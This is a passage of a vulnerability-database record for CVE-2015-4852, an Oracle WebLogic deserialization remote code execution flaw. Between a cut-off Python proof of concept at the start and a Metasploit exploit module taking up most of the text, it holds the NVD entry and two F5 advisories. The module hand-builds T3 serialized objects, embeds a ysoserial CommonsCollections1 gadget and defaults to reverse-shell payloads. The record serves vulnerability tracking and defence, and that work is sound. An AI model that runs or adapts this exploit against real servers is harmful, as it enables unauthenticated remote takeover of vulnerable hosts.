4\\x63\\x68\\x49\\x00\\x0b\\x73\\x65\\x72\\x76\\x69\\x63\\x65\\x50\\x61\\x63\\x6b\\x5a\\x00\\x0e\\x74\\x65\\x6d\\x70\\x6f\\x72\\x61\\x72\\x79\\x50\\x61\\x74\\x63\\x68\\x4c\\x00\\x09\\x69\\x6d\\x70\\x6c\\x54\\x69\\x74\\x6c\\x65\\x74\\x00\\x12\\x4c\\x6a\\x61\\x76\\x61\\x2f\\x6c\\x61\\x6e\\x67\\x2f\\x53\\x74\\x72\\x69\\x6e\\x67\\x3b\\x4c\\x00\\x0a\\x69\\x6d\\x70\\x6c\\x56\\x65\\x6e\\x64\\x6f\\x72\\x71\\x00\\x7e\\x00\\x03\\x4c\\x00\\x0b\\x69\\x6d\\x70\\x6c\\x56\\x65\\x72\\x73\\x69\\x6f\\x6e\\x71\\x00\\x7e\\x00\\x03\\x78\\x70\\x77\\x02\\x00\\x00\\x78\\xfe\\x01\\x00\\x00'\r

\r

#print \"[+]Updated 'chunk1' : \

\", chunk1\r

\r

#Get the final payload. This should have appropriate TOTAL payload lenght in 'chunk1'\r

payload = chunk1 + chunk2 + chunk3\r

\r

#Adjust header for appropriate message length\r

payload = \"{0}{1}\".format(struct.pack('!i', len(payload)), payload[4:])\r

print '[+]Sending payload...'\r

sock.send(payload)\r

\r

print \"[+]Done! You should see ICMP ECHO requests from your target to your attacking machine!!\"\r

print(\"\

[+]Response to Request#: \

\")\r

response = sock.recv(15000)\r

print(response)\r

\r

", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/42806/"}

{"cve": [{"lastseen": "2019-05-29T18:14:42", "description": "The WLS Security component in Oracle WebLogic Server 10.3.6.0, 12.1.2.0, 12.1.3.0, and 12.2.1.0 allows remote attackers to execute arbitrary commands via a crafted serialized Java object in T3 protocol traffic to TCP port 7001, related to oracle_common/modules/com.bea.core.apache.commons.collections.jar. NOTE: the scope of this CVE is limited to the WebLogic Server product.", "edition": 1, "cvss3": {}, "published": "2015-11-18T15:59:00", "title": "CVE-2015-4852", "type": "cve", "cwe": ["CWE-77"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-4852"], "modified": "2019-03-28T19:29:00", "cpe": ["cpe:/a:oracle:weblogic_server:10.3.6.0.0", "cpe:/a:oracle:weblogic_server:12.1.3.0.0", "cpe:/a:oracle:weblogic_server:12.2.1.0.0", "cpe:/a:oracle:weblogic_server:12.1.2.0.0"], "id": "CVE-2015-4852", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-4852", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:oracle:weblogic_server:10.3.6.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:weblogic_server:12.2.1.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:weblogic_server:12.1.3.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:weblogic_server:12.1.2.0.0:*:*:*:*:*:*:*"]}], "f5": [{"lastseen": "2020-04-06T22:40:26", "bulletinFamily": "software", "cvelist": ["CVE-2015-4852"], "description": "

F5 Product Development has assigned ID 557810 (BIG-IP), ID 466536 (ARX), and ID 558495 (Enterprise Manager) to this vulnerability, and has evaluated the currently supported releases for potential vulnerability. Additionally, [BIG-IP iHealth](<http://www.f5.com/support/support-tools/big-ip-ihealth/>) may list Heuristic H30518307 on the** Diagnostics** > **Identified** > **Low** page.



To determine if your release is known to be vulnerable, the components or features that are affected by the vulnerability, and for information about releases or hotfixes that address the vulnerability, refer to the following table.



Product | Versions known to be vulnerable | Versions known to be not vulnerable | Severity | Vulnerable component or feature

---|---|---|---|---

BIG-IP LTM | 12.0.0

11.0.0 - 11.6.1 | 12.1.0

10.1.0 - 10.2.4 | Low | Java commons-collections library

BIG-IP AAM | 12.0.0

11.4.0 - 11.6.1 | 12.1.0 | Low | Java commons-collections library

BIG-IP AFM | 12.0.0

11.3.0 - 11.6.1 | 12.1.0 | Low | Java commons-collections library

BIG-IP Analytics | 12.0.0

11.0.0 - 11.6.1 | 12.1.0 | Low | Java commons-collections library

BIG-IP APM | 12.0.0

11.0.0 - 11.6.1 | 12.1.0

10.1.0 - 10.2.4 | Low | Java commons-collections library

BIG-IP ASM | 12.0.0

11.0.0 - 11.6.1 | 12.1.0

10.1.0 - 10.2.4 | Low | Java commons-collections library

BIG-IP DNS | 12.0.0 | 12.1.0 | Low | Java commons-collections library

BIG-IP Edge Gateway | 11.0.0 - 11.3.0 | 10.1.0 - 10.2.4 | Low | Java commons-collections library

BIG-IP GTM | 11.0.0 - 11.6.1 | 10.1.0 - 10.2.4 | Low | Java commons-collections library

BIG-IP Link Controller | 12.0.0

11.0.0 - 11.6.1 | 12.1.0

10.1.0 - 10.2.4 | Low | Java commons-collections library

BIG-IP PEM | 12.0.0

11.3.0 - 11.6.1 | 12.1.0 | Low | Java commons-collections library

BIG-IP PSM | 11.0.0 - 11.4.1 | 10.1.0 - 10.2.4 | Low | Java commons-collections library

BIG-IP WebAccelerator | 11.0.0 - 11.3.0 | 10.1.0 - 10.2.4 | Low | Java commons-collections library

BIG-IP WOM | 11.0.0 - 11.3.0 | 10.1.0 - 10.2.4 | Low | Java commons-collections library

ARX | 6.0.0 - 6.4.0 | None | Low | Java commons-collections library

Enterprise Manager | 3.0.0 - 3.1.1 | None | High | Java commons-collections library

FirePass | None | 7.0.0

6.0.0 - 6.1.0 | Not vulnerable | None

BIG-IQ Cloud | None | 4.0.0 - 4.5.0 | Not vulnerable | None

BIG-IQ Device | None | 4.2.0 - 4.5.0 | Not vulnerable | None

BIG-IQ Security | None | 4.0.0 - 4.5.0 | Not vulnerable | None

BIG-IQ ADC | None | 4.5.0 | Not vulnerable | None

LineRate | None | 2.5.0 - 2.6.1 | Not vulnerable | None

F5 WebSafe | None | 1.0.0 | Not vulnerable | None

Traffix SDC | 4.0.0 - 4.4.0

3.3.2 - 3.5.1 | None | Low | Java commons-collections library



If you are running a version listed in the **Versions known to be vulnerable** column, you can eliminate this vulnerability by upgrading to a version listed in the **Versions known to be not vulnerable** column. If the table lists only an older version than what you are currently running, or does not list a non-vulnerable version, then no upgrade candidate currently exists.



Mitigation



To mitigate this vulnerability, perform either of the following suggestions:



* [Limiting local shell and tmui access to trusted administrative users only](<https://support.f5.com/csp/article/K30518307#m1>)

* [Mitigating using an updated BIG-IP ASM attack signature](<https://support.f5.com/csp/article/K30518307#m2>)



Limiting local shell and tmui access to trusted administrative users only



**Impact of action:** _Performing the following action should not have a negative impact on your system._



For information about limiting administrative access, refer to [K12029: Accessing the TMOS Shell](<https://support.f5.com/csp/article/K12029>).



Mitigating using an updated BIG-IP ASM attack signature



**Impact of action:** _Performing the following action should not have a negative impact on your system._



For customers who employ the BIG-IP ASM system in their security architecture, the **ASM-SignatureFile_20151122_113350** attack signature file** **(or later) is able to detect Java serialized objects that may be used in an attack. For information about BIG-IP ASM attack signatures, refer to [K8217: Managing BIG-IP ASM attack signatures](<https://support.f5.com/csp/article/K8217>).



* [K9970: Subscribing to email notifications regarding F5 products](<https://support.f5.com/csp/article/K9970>)

* [K9957: Creating a custom RSS feed to view new and updated documents](<https://support.f5.com/csp/article/K9957>)

* [K4602: Overview of the F5 security vulnerability response policy](<https://support.f5.com/csp/article/K4602>)

* [K4918: Overview of the F5 critical issue hotfix policy](<https://support.f5.com/csp/article/K4918>)

* [K167: Downloading software and firmware from F5](<https://support.f5.com/csp/article/K167>)

* [K17465: Determining if a Known Issue is resolved for a specific BIG-IP version](<https://support.f5.com/csp/article/K17465>)

* [K13123: Managing BIG-IP product hotfixes (11.x - 13.x)](<https://support.f5.com/csp/article/K13123>)

", "edition": 1, "modified": "2018-08-28T21:28:00", "published": "2015-12-15T22:19:00", "id": "F5:K30518307", "href": "https://support.f5.com/csp/article/K30518307", "title": "Java commons-collections library vulnerability CVE-2015-4852", "type": "f5", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2016-09-26T17:22:57", "bulletinFamily": "software", "cvelist": ["CVE-2015-4852"], "edition": 1, "description": "Vulnerability Recommended Actions



If you are running a version listed in the **Versions known to be vulnerable** column, you can eliminate this vulnerability by upgrading to a version listed in the **Versions known to be not vulnerable** column. If the table lists only an older version than what you are currently running, or does not list a non-vulnerable version, then no upgrade candidate currently exists.



F5 responds to vulnerabilities in accordance with the **Severity** values published in the previous table. The **Severity** values and other security vulnerability parameters are defined in SOL4602: Overview of the F5 security vulnerability response policy.



To mitigate this vulnerability, perform either of the following suggestions:



Limiting local shell and tmui access to trusted administrative users only



**Impact of action:** _Performing the following action should not have a negative impact on your system._



For information about limiting administrative access, refer to SOL12029: Accessing the Traffic Management Shell.



Mitigating using an updated BIG-IP ASM attack signature



**Impact of action:** _Performing the following action should not have a negative impact on your system._



For customers who employ the BIG-IP ASM system in their security architecture, the **ASM-SignatureFile_20151122_113350** attack signature file** **(or later) is able to detect Java serialized objects that may be used in an attack. For information about BIG-IP ASM attack signatures, refer to SOL8217: Updating the BIG-IP ASM attack signatures.



Supplemental Information



* SOL9970: Subscribing to email notifications regarding F5 products

* SOL9957: Creating a custom RSS feed to view new and updated documents

* SOL4918: Overview of the F5 critical issue hotfix policy

* SOL167: Downloading software and firmware from F5

* SOL17465: Determining if a Known Issue is resolved for a specific BIG-IP version

* SOL13123: Managing BIG-IP product hotfixes (11.x - 12.x)

", "modified": "2016-05-28T00:00:00", "published": "2015-12-15T00:00:00", "href": "http://support.f5.com/kb/en-us/solutions/public/k/30/sol30518307.html", "id": "SOL30518307", "title": "SOL30518307 - Java commons-collections library vulnerability CVE-2015-4852", "type": "f5", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "exploitdb": [{"lastseen": "2019-03-28T17:03:19", "description": "", "published": "2019-03-28T00:00:00", "type": "exploitdb", "title": "Oracle Weblogic Server Deserialization RCE - Raw Object (Metasploit)", "bulletinFamily": "exploit", "cvelist": ["CVE-2015-4852"], "modified": "2019-03-28T00:00:00", "id": "EDB-ID:46628", "href": "https://www.exploit-db.com/exploits/46628", "sourceData": "##\r

# This module requires Metasploit: https://metasploit.com/download\r

# Current source: https://github.com/rapid7/metasploit-framework\r

##\r

\r

require 'msf/core/exploit/powershell'\r

\r

class MetasploitModule < Msf::Exploit::Remote\r

Rank = ExcellentRanking\r

\r

include Msf::Exploit::Remote::Tcp\r

#include Msf::Exploit::Remote::HttpClient\r

include Msf::Exploit::Powershell\r

\r

def initialize(info={})\r

super(update_info(info,\r

'Name' => 'Oracle Weblogic Server Deserialization RCE - Raw Object',\r

'Description' => %q{\r

An unauthenticated attacker with network access to the Oracle Weblogic Server T3\r

interface can send a serialized object (weblogic.jms.common.StreamMessageImpl)\r

to the interface to execute code on vulnerable hosts.\r

},\r

'Author' =>\r

[\r

'Andres Rodriguez', # Metasploit Module - 2Secure (@acamro, acamro[at]gmail.com)\r

'Stephen Breen', # Vulnerability Discovery\r

'Aaron Soto' # Reverse Engineering JSO and ysoserial blobs\r

],\r

'License' => MSF_LICENSE,\r

'References' =>\r

[\r

['CVE', '2015-4852']\r

],\r

'Privileged' => false,\r

'Platform' => %w{ unix win solaris },\r

'Targets' =>\r

[\r

[ 'Unix',\r

'Platform' => 'unix',\r

'Arch' => ARCH_CMD,\r

'DefaultOptions' => {'PAYLOAD' => 'cmd/unix/reverse_python'},\r

'Payload' => {\r

'Encoder' => 'cmd/ifs',\r

'BadChars' => ' ',\r

'Compat' => {'PayloadType' => 'cmd', 'RequiredCmd' => 'python'}\r

}\r

],\r

[ 'Windows',\r

'Platform' => 'win',\r

'Payload' => {},\r

'DefaultOptions' => {'PAYLOAD' => 'windows/meterpreter/reverse_tcp'}\r

],\r

[ 'Solaris',\r

'Platform' => 'solaris',\r

'Arch' => ARCH_CMD,\r

'DefaultOptions' => {'PAYLOAD' => 'cmd/unix/reverse_perl'},\r

'Payload' => {\r

'Space' => 2048,\r

'DisableNops' => true,\r

'Compat' =>\r

{\r

'PayloadType' => 'cmd',\r

'RequiredCmd' => 'generic perl telnet',\r

}\r

}\r

]\r

],\r

'DefaultTarget' => 0,\r

'DisclosureDate' => 'Jan 28 2015'))\r

\r

register_options([Opt::RPORT(7001)])\r

end\r

\r

=begin This check is currently incompatible with the Tcp mixin. :-(\r

def check\r

resp = send_request_cgi(\r

'method' => 'GET',\r

'uri' => '/console/login/LoginForm.jsp'\r

)\r

\r

return CheckCode::Unknown unless resp && resp.code == 200\r

\r

unless resp.body.include?('Oracle WebLogic Server Administration Console')\r

vprint_warning(\"Oracle WebLogic Server banner cannot be found\")\r

return CheckCode::Unknown\r

end\r

\r

/WebLogic Server Version: (?<version>\\d+\\.\\d+\\.\\d+\\.\\d*)/ =~ resp.body\r

unless version\r

vprint_warning(\"Oracle WebLogic Server version cannot be found\")\r

return CheckCode::Unknown\r

end\r

\r

version = Gem::Version.new(version)\r

vprint_good(\"Detected Oracle WebLogic Server Version: #{version}\")\r

case\r

when version.to_s.start_with?('10.3')\r

return CheckCode::Appears unless version > Gem::Version.new('10.3.6.0')\r

when version.to_s.start_with?('12.1.2')\r

return CheckCode::Appears unless version > Gem::Version.new('12.1.2.0')\r

when version.to_s.start_with?('12.1.3')\r

return CheckCode::Appears unless version > Gem::Version.new('12.1.3.0')\r

when version.to_s.start_with?('12.2')\r

return CheckCode::Appears unless version > Gem::Version.new('12.2.1.0')\r

end\r

\r

return CheckCode::Safe\r

end\r

=end\r

\r

def t3_handshake\r

# retrieved from network traffic\r

shake = \"t3 12.2.1\

\"\r

shake << \"AS:255\

\"\r

shake << \"HL:19\

\"\r

shake << \"MS:10000000\

\

\"\r

\r

sock.put(shake)\r

sleep(1)\r

sock.get_once\r

end\r

\r

def build_t3_request_object\r

# T3 request serialized data\r

# retrieved by watching network traffic\r

# This is a proprietary, undocumented protocol\r

\r

# TODO: Cite a source for the dissection of in the following 14 lines:\r

data = '000005c3' # lenght of the packet\r

data << '01' # CMD_IDENTIFY_REQUEST\r

data << '65' # QOS\r

data << '01' # Flags:\r

# CONTEXT_JVMID_FLAG = 1 (has JVMIDs)\r

# CONTEXT_TX_FLAG = 2\r

# CONTEXT_TRACE_FLAG = 4\r

# CONTEXT_EXTENDED_FLAG = 8\r

# CONTEXT_EXTENDED_USER_FLAG = 16\r

data << 'ffffffff' # response id\r

data << 'ffffffff' # invocable id\r

data << '0000006a' # abbrev offset\r

data << '0000ea60' # reconnect timeout ??\r

\r

data << '0000001900937b484a'\r

data << '56fa4a777666f581daa4f5b90e2aebfc607499'\r

data << 'b4027973720078720178720278700000000a00'\r

data << '00000300000000000000060070707070707000'\r

data << '00000a000000030000000000000006007006'\r

\r

data << 'fe010000' # ----- separator -----\r

\r

data << 'aced0005' # JSO v5 header\r

data << '73' # object header\r

data << '72001d' # className (29 bytes):\r

data << '7765626c6f6769632e726a766d2e436c617373' # weblogic.rjvm.ClassTableEntry\r

data << '5461626c65456e747279' # (continued)\r

data << '2f52658157f4f9ed' # serialVersionUID\r

data << '0c00007870' # remainder of object header\r

data << '72' # object header\r

data << '00247765626c6f6769632e636f6d6d6f6e2e696e74' # className (36 bytes): weblogic.common.internal.PackageInfo\r

data << '65726e616c2e5061636b616765496e666f' # (continued)\r

data << 'e6f723e7b8ae1ec9' # serialVersionUID\r

data << '02' # SC_SERIALIZABLE\r

data << '0008' # fieldCount = 8\r

data << '4900056d616a6f72' # 0: Int: major\r

data << '4900056d696e6f72' # 1: Int: minor\r

data << '49000c726f6c6c696e675061746368' # 2: Int rollingPatch\r

data << '49000b736572766963655061636b' # 3: Int: servicePack\r

data << '5a000e74656d706f726172795061746368' # 4: Bool: temporaryPatch\r

data << '4c0009696d706c5469746c65' # 5: Obj: implTitle\r

data << '7400124c6a6176612f6c616e672f537472696e673b' # java/lang/String\r

data << '4c000a696d706c56656e646f72' # 6: Obj: implVendor\r

data << '71007e0003' # (Handle) 0x007e0003\r

data << '4c000b696d706c56657273696f6e' # 7: Obj: implVersion\r

data << '71007e0003' # (Handle) 0x007e0003\r

data << '78707702000078' # block footers\r

\r

data << 'fe010000' # ----- separator -----\r

\r

data << 'aced0005' # JSO v5 header\r

data << '7372' # object header\r

data << '001d7765626c6f6769632e726a766d2e436c6173' # className (29 bytes): weblogic.rjvm.ClassTableEntry\r

data << '735461626c65456e747279' # (continued)\r

data << '2f52658157f4f9ed' # serialVersionUID\r

data << '0c' # EXTERNALIZABLE | BLOCKDATA\r

data << '00007870' # remainder of object header\r

data << '72' # object header\r

data << '00247765626c6f6769632e636f6d6d6f6e2e696' # className (36 bytes): weblogic.common.internal.VersionInfo\r

data << 'e7465726e616c2e56657273696f6e496e666f' # (continued)\r

data << '972245516452463e' # serialVersionUID\r

data << '02' # SC_SERIALIZABLE\r

data << '0003' # fieldCount = 3\r

data << '5b0008' # array header (8 bytes)\r

data << '7061636b61676573' # ARRAY NAME = 'packages'\r

data << '740027' # TC_STRING className1 (39 bytes)\r

data << '5b4c7765626c6f6769632f636f6d6d6f6e2f69' # weblogic/common/internal/PackageInfo\r

data << '6e7465726e616c2f5061636b616765496e666f' # (continued)\r

data << '3b' # (continued)\r

data << '4c000e' # object header (14 bytes)\r

data << '72656c6561736556657273696f6e' # releaseVersion\r

data << '740012' # TC_STRING (18 bytes)\r

data << '4c6a6176612f6c616e672f537472696e673b' # versionInfoAsBytes\r

data << '5b0012' # array header (18 bytes)\r

data << '76657273696f6e496e666f41734279746573' # ARRAY NAME = java/lang/String;\r

data << '740002' # TC_STRING (2 bytes)\r

data << '5b42' # 0x5b42 = [B\r

data << '78' # block footer\r

\r

data << '720024' # class (36 bytes)\r

data << '7765626c6f6769632e636f6d6d6f6e2e696e' # weblogic.common.internal.PackageInfo\r

data << '7465726e616c2e5061636b616765496e666f' # (continued)\r

data << 'e6f723e7b8ae1ec9' # serialVersionUID\r

\r

data << '02' # SC_SERIALIZABLE\r

data << '0008' # fieldCount = 8\r

data << '4900056d616a6f72' # 0: Int: major\r

data << '4900056d696e6f72' # 1: Int: minor\r

data << '49000c726f6c6c696e675061746368' # 2: Int rollingPatch\r

data << '49000b736572766963655061636b' # 3: Int: servicePack\r

data << '5a000e74656d706f726172795061746368' # 4: Bool: temporaryPatch\r

data << '4c0009696d706c5469746c65' # 5: Obj: implTitle\r

data << '71' # TC_REFERENCE\r

data << '007e0004' # Handle = 0x007e0004\r

data << '4c000a696d706c56656e646f72' # 6: Obj: implVendor\r

data << '71' # TC_REFERENCE\r

data << '007e0004' # Handle = 0x007e0004\r

data << '4c000b696d706c56657273696f6e' # 7: Obj: implVersion\r

data << '71' # TC_REFERENCE\r

data << '007e0004' # Handle = 0x007e0004\r

data << '78' # class footer\r

data << '70' # TC_NULL\r

data << '77020000' # BLOCKDATA (2 bytes): 0x0000\r

data << '78' # block footer\r

\r

data << 'fe010000' # ----- separator -----\r

\r

data << 'aced0005' # JSO v5 header\r

data << '73' # object header\r

data << '72001d' # className (29 bytes):\r

data << '7765626c6f6769632e726a766d2e436c617373' # weblogic.rjvm.ClassTableEntry\r

data << '5461626c65456e747279' # (continued)\r

data << '2f52658157f4f9ed' # serialVersionUID\r

data << '0c00007870' # remainder of object header\r

data << '720021' # className (33 bytes)\r

data << '7765626c6f6769632e636f6d6d6f6e2e696e74' # weblogic.common.internal.PeerInfo\r

data << '65726e616c2e50656572496e666f' # (continued)\r

data << '585474f39bc908f1' # serialVersionUID\r

data << '02' # SC_SERIALIZABLE\r

data << '0006' # fieldCount = 6\r

data << '4900056d616a6f72' # 0: Int: major\r

data << '4900056d696e6f72' # 1: Int: minor\r

data << '49000c726f6c6c696e675061746368' # 2: Int rollingPatch\r

data << '49000b736572766963655061636b' # 3: Int: servicePack\r

data << '5a000e74656d706f726172795061746368' # 4: Bool: temporaryPatch\r

data << '5b00087061636b61676573' # 5: Array: packages\r

data << '740027' # TC_STRING (39 bytes)\r

data << '5b4c7765626c6f6769632f636f6d6d6f6e2f69' # Lweblogic/common/internal/PackageInfo;\r

data << '6e7465726e616c2f5061636b616765496e666f' # (continued)\r

data << '3b' # (continued)\r

data << '78' # block footer\r

data << '720024' # class header\r

data << '7765626c6f6769632e636f6d6d6f6e2e696e74' # Name = Lweblogic/common/internal/PackageInfo;\r

data << '65726e616c2e56657273696f6e496e666f' # (continued)\r

data << '972245516452463e' # serialVersionUID\r

data << '02' # SC_SERIALIZABLE\r

data << '0003' # fieldCount = 3\r

data << '5b0008' # 0: Array\r

data << '7061636b6167657371' # packages\r

data << '007e0003' # Handle = 0x00730003\r

data << '4c000e72656c6561736556657273696f6e' # 1: Obj: releaseVersion\r

data << '7400124c6a6176612f6c616e672f537472696e673b' # Ljava/lang/String;\r

data << '5b001276657273696f6e496e666f41734279746573' # 2: Array: versionInfoAsBytes\r

data << '740002' # TC_STRING (2 bytes)\r

data << '5b42' # VALUE = 0x5b42 = [B\r

data << '78' # block footer\r

data << '720024' # class header\r

data << '7765626c6f6769632e636f6d6d6f6e2e696e746572' # Name = weblogic.common.internal.PackageInfo\r

data << '6e616c2e5061636b616765496e666f' # (continued)\r

data << 'e6f723e7b8ae1ec9' # serialVersionUID\r

data << '02' # SC_SERIALIZABLE\r

data << '0008' # fieldCount = 8\r

data << '4900056d616a6f72' # 0: Int: major\r

data << '4900056d696e6f72' # 1: Int: minor\r

data << '49000c726f6c6c696e675061746368' # 2: Int rollingPatch\r

data << '49000b736572766963655061636b' # 3: Int: servicePack\r

data << '5a000e74656d706f726172795061746368' # 4: Bool: temporaryPatch\r

data << '4c0009696d706c5469746c65' # 5: Obj: implTitle\r

data << '71' # TC_REFERENCE\r

data << '007e0005' # Handle = 0x007e0005\r

data << '4c000a696d706c56656e646f72' # 6: Obj: implVendor\r

data << '71' # TC_REFERENCE\r

data << '007e0005' # Handle = 0x007e0005\r

data << '4c000b696d706c56657273696f6e' # 7: Obj: implVersion\r

data << '71' # TC_REFERENCE\r

data << '007e0005' # Handle = 0x007e0005\r

data << '78' # class footer\r

data << '707702000078' # block footers\r

\r

data << 'fe00ff' # this cruft again. some kind of footer\r

\r

data << 'fe010000' # ----- separator -----\r

\r

# weblogic.rjvm.JVMID object\r

data << 'aced0005' # JSO v5 header\r

data << '73' # object header\r

data << '720013' # class header\r

data << '7765626c6f6769632e726a766d2e4a564d4944' # name = 'weblogic.rjvm.JVMID'\r

data << 'dc49c23ede121e2a' # serialVersionUID\r

data << '0c' # EXTERNALIZABLE | BLOCKDATA\r

data << '0000' # fieldCount = 0 (!!!)\r

data << '78' # block footer\r

data << '70' # NULL\r

data << '7750' # block header (80 bytes)\r

data << '21' # !\r

data << '000000000000000000' # 9 NULL BYTES\r

\r

data << '0d' # strLength = 13 bytes\r

#data << '3139322e3136382e312e323237' # original PoC string = 192.168.1.227\r

data << '3030302e3030302e3030302e30' # new string = 000.000.000.0\r

# (must be an IP, and length isn't trivially editable)\r

data << '00' # \\0\r

\r

data << '12' # strLength = 18 bytes\r

#data << '57494e2d4147444d565155423154362e6568' # original str = WIN-AGDMVQUB1T6.eh\r

data << rand_text_alphanumeric(18).unpack('H*')[0]\r

\r

data << '83348cd6' # original = ??? UNKNOWN ??? (Note: Cannot be randomized)\r

\r

data << '000000070000' # ??? UNKNOWN ???\r

data << rport.to_s(16).rjust(4, '0') # callback port\r

data << 'ffffffffffffffffffffffffffffffffffffff' # ??? UNKNOWN ???\r

data << 'ffffffffff' # ??? UNKNOWN ???\r

data << '78' # block footer\r

\r

data << 'fe010000' # ----- separator -----\r

\r

# weblogic.rjvm.JVMID object\r

data << 'aced0005' # JSO v5 header\r

data << '73' # object header\r

data << '72' # class\r

data << '00137765626c6f6769632e726a766d2e4a564d4944' # Name: weblogic.rjvm.JVMID\r

data << 'dc49c23ede121e2a' # serialVersionUID\r

data << '0c' # EXTERNALIZABLE | BLOCKDATA\r

data << '0000' # fieldCount = 0\r

data << '78' # end block\r

data << '70' # TC_NULL\r

data << '77' # block header\r

data << '20' # length = 32 bytes\r

data << '0114dc42bd071a772700' # old string = ??? UNKNOWN ???\r

#data << rand_text_alphanumeric(10).unpack('H*')[0] # (NOTE: RANDOMIZAITON BREAKS THINGS)\r

\r

data << '0d' # string length = 13 bytes (NOTE: do not edit)\r

#data << '3234322e3231342e312e323534' # original string = 242.214.1.254\r

data << '3030302e3030302e3030302e30' # new string = 000.000.000.0\r

# (must be an IP, and length isn't trivially editable)\r

\r

#data << '61863d1d' # original string = ??? UNKNOWN ???\r

data << rand_text_alphanumeric(4).unpack('H*')[0] # new = randomized\r

\r

data << '00000000' # NULL BYTES\r

data << '78' # block footer\r

\r

sock.put([data].pack('H*'))\r

sleep(1)\r

sock.get_once\r

end\r

\r

def send_payload_objdata\r

# payload creation\r

if target.name == 'Windows'\r

mycmd = cmd_psh_payload(payload.encoded, payload_instance.arch.first, {remove_comspec: true})\r

elsif target.name == 'Unix' || target.name == 'Solaris'\r

mycmd = payload.encoded\r

end\r

\r

# basic weblogic ClassTableEntry object (serialized)\r

# TODO: WHAT DOES THIS DO? CAN WE RANDOMIZE ANY OF IT?\r

payload = '056508000000010000001b0000005d0101007372017870737202787000000000'\r

payload << '00000000757203787000000000787400087765626c6f67696375720478700000'\r

payload << '000c9c979a9a8c9a9bcfcf9b939a7400087765626c6f67696306'\r

\r

payload << 'fe010000' # ----- separator -----\r

\r

payload << 'aced0005' # JSO v5 header\r

payload << '73' # object header\r

payload << '72' # class\r

payload << '001d7765626c6f6769632e726a766d2e436c61' # Name: weblogic.rjvm.ClassTableEntry\r

payload << '73735461626c65456e747279' # (cont)\r

payload << '2f52658157f4f9ed' # serialVersionUID\r

payload << '0c' # EXTERNALIZABLE | BLOCKDATA\r

payload << '0000' # fieldCount = 0\r

payload << '7870' # remaining object header\r

payload << '72' # class header\r

payload << '00025b42' # Name: 0x5b42\r

payload << 'acf317f8060854e0' # serialVersionUID\r

payload << '02' # SERIALIZABLE\r

payload << '0000' # fieldCount = 0\r

payload << '7870' # class footer\r

payload << '77' # block header\r

payload << '020000' # contents = 0x0000\r

payload << '78' # block footer\r

\r

payload << 'fe010000' # ----- separator -----\r

\r

payload << 'aced0005' # JSO v5 header\r

payload << '73' # object header\r

payload << '72' # class\r

payload << '001d7765626c6f6769632e726a766d2e436c61' # Name: weblogic.rjvm.ClassTableEntry\r

payload << '73735461626c65456e747279' # (cont)\r

payload << '2f52658157f4f9ed' # serialVersionUID\r

payload << '0c' # EXTERNALIZABLE | BLOCKDATA\r

payload << '0000' # fieldCount = 0\r

payload << '7870' # remaining object header\r

payload << '72' # class header\r

\r

payload << '00135b4c6a6176612e6c616e672e4f626a' # Name: [Ljava.lang.Object;\r

payload << '6563743b' # (cont)\r

payload << '90ce589f1073296c' # serialVersionUID\r

payload << '02' # SERIALIZABLE\r

payload << '0000' # fieldCount = 0\r

payload << '7870' # remaining object header\r

payload << '77' # block header\r

payload << '020000' # contents = 0x0000\r

payload << '78' # block footer\r

\r

payload << 'fe010000' # ----- separator -----\r

\r

payload << 'aced0005' # JSO v5 header\r

payload << '73' # object header\r

payload << '72' # class\r

\r

payload << '001d7765626c6f6769632e726a766d2e436c61' # Name: weblogic.rjvm.ClassTableEntry\r

payload << '73735461626c65456e747279' # (cont)\r

payload << '2f52658157f4f9ed' # serialVersionUID\r

payload << '0c' # SERIALIZABLE | BLOCKDATA\r

payload << '0000' # fieldCount = 0\r

payload << '7870' # block footer\r

payload << '72' # class header\r

payload << '00106a6176612e7574696c2e566563746f72' # Name: java.util.Vector\r

payload << 'd9977d5b803baf01' # serialVersionUID\r

payload << '03' # WRITE_METHOD | SERIALIZABLE\r

payload << '0003' # fieldCount = 3\r

payload << '4900116361706163697479496e6372656d656e74' # 0: Int: capacityIncrement\r

payload << '49000c656c656d656e74436f756e74' # 1: Int: elementCount\r

payload << '5b000b656c656d656e7444617461' # 2: Array: elementData\r

payload << '7400135b4c6a6176612f6c616e672f4f626a6563' # 3: String: [Ljava/lang/Object;\r

payload << '743b' # (cont)\r

payload << '7870' # remaining object header\r

payload << '77' # block header\r

payload << '020000' # contents = 0x0000\r

payload << '78' # block footer\r

\r

payload << 'fe010000' # ----- separator -----\r

\r

ysoserial_payload = ::Msf::Util::JavaDeserialization.ysoserial_payload(\"CommonsCollections1\",mycmd)\r

payload << ysoserial_payload.each_byte.map { |b| b.to_s(16).rjust(2,'0') }.join\r

\r

payload << 'fe010000' # ----- separator -----\r

\r

# basic weblogic ImmutableServiceContext object (serialized)\r

payload << 'aced0005' # JSO v5 header\r

payload << '73' # object header\r

payload << '72' # class\r

payload << '00257765626c6f6769632e726a766d2e496d6d75' # Name: weblogic.rjvm.ImmutableServiceContext\r

payload << '7461626c6553657276696365436f6e74657874' # (cont)\r

payload << 'ddcba8706386f0ba' # serialVersionUID\r

payload << '0c' # EXTERNALIZABLE | BLOCKDATA\r

payload << '0000' # fieldCount = 0\r

payload << '78' # object footer\r

payload << '72' # block header\r

